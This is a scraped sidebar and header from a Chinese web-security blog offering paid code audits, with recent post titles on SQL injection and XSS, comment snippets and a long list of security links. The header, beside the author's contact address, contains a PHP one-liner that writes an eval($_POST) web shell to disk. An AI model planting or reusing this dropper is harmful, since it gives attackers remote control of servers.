5up3rh3i'blog[提供有偿web代码安全审计服务]
MSN:SuperHei@ph4nt0m.org< ?fputs(fopen('heige.php','w+'),'< ?php @eval($_POST[c])? >');? >
管理
进入后台
写新日志
文章管理
评论管理
更换模板
访问统计
搜索
最新日志
[zz]Microsoft Blogs and Web Resources about Security
学习WebZine [0x02]后乱谈
犯了个很严重的错误 :(
Data:_URI_scheme
WebZine [0x02]
Bypassing script filters with variable-width encodings
A New Class of Vulnerability in Oracle: Lateral SQL Injection
一个图片引起的8挂
Time-Based Blind SQL Injection with Heavy Queries
[zz]Microsoft word javascript execution
最新评论
superhei
:
http://bbs.securitycn.net/re...
Jnc
:
我当时测试的确是允许的 你那个图不能说明什么,阻挡可能...
est
:
IE8也支持这个该死的data:了?我日。...
superhei
:
blog最上面有啊 MSN:SuperHei@ph4nt...
ghostrider
:
黑兄,能告知一个联系方式吗?关于代码审计的,想找你谈谈!...
superhei
:
哈哈,想必xxoxx是"大公司"出来...
xxoxx
:
你适合去大公司写文档,可以把很简单的技术写得复杂化,外加...
Toby57
:
“有个 flase的结果都是flash”是不是“有个 f...
追寻
:
Superhei前辈,你也是衡阳人吗? 我是衡阳的,想...
Mix
:
汗一个,这样也行~
链接
#########
舒舒
二哥哥
lanker
fa1l3n
axis
swap
lvhuana
spr1t3
小沈
fox
随便名字
GaRY
7j
RAyH4c
#########
PST
HackTic
2600
NGS
cgisecurity
owasp
seclists
argeniss
phpsec
bugtraq
milw0rm
phpsecure
T.H.C
webappsec
phpsec'blog
shiflett.org
secyou
Rst
waraxe
appsecinc
northern-monkee
blog.0x557
ush
EST
securityreason
infoshackers
zwell
spidynamics
morx
securitytracker
modsecurity
securiteam
securiteam's blog
phpclasse
hardened-php
csdn
pro-hack
f-secure
rubyforge
wisec
redteam-pentesting
alertpool
blog.php-security
timvw
sqlsec
sourceforge
zeroknock
qasec
hacksafe
smartsecurity
gulftech
thespanner
nth-dimension.org.uk
secweb
cera.secniche.org
swan不是牛
Getahead
xssed
kuza55
myappsecurity
xssworm
playhack
hackademix
manicode
switch
planet-websecurity
disenchant.ch
hackathology
blueinfy
bindshell
net-square
yaisb
sirdarckcat
googleonlinesecurity
########
darkc0de
darknet
insecuremag
serversniff
tbs_pocket_knife
seeknot
php手册
frsirt-google
grip
vuln.watch
securitytracker.com
connectionstrings
oracle sec
r00tin
rawlab
sommarskog
taossa
neilcar
spl0it
notsosecure.com
dross
ie's blog
bluehat
访问统计:
什么是RSS?
博客大巴指南
免费注册博客大巴